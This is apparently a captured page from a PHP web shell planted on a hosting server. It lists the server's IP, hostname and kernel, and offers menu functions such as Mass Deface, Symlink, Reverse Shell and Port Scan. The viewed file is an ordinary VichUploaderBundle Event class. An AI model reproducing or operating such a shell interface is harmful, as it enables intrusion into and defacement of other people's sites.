ヤミRoot VoidGate
User / IP
:
216.73.216.49
Host / Server
:
146.88.233.70 / www.dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
vich
/
uploader-bundle
/
src
/
Event
/
Viewing: Event.php
<?php namespace Vich\UploaderBundle\Event; use Symfony\Contracts\EventDispatcher\Event as ContractEvent; use Vich\UploaderBundle\Mapping\PropertyMapping; /* * Base class for upload events. * * @author Kévin Gomez <contact@kevingomez.fr> */ class Event extends ContractEvent { /** @var object */ protected $object; /** @var PropertyMapping */ protected $mapping; /** @var bool */ protected $cancel = false; public function __construct($object, PropertyMapping $mapping) { $this->object = $object; $this->mapping = $mapping; } /** * Accessor to the object being manipulated. * * @return object */ public function getObject() { return $this->object; } /** * Accessor to the mapping used to manipulate the object. */ public function getMapping(): PropertyMapping { return $this->mapping; } /** * Cancels the execution of the actual request. * Only works for the vich_uploader.pre_remove event. */ public function cancel(): void { $this->cancel = true; } /** * Returns whether further processing of the request should be executed. */ public function isCanceled(): bool { return $this->cancel; } }
Coded With 💗 by
0x6ick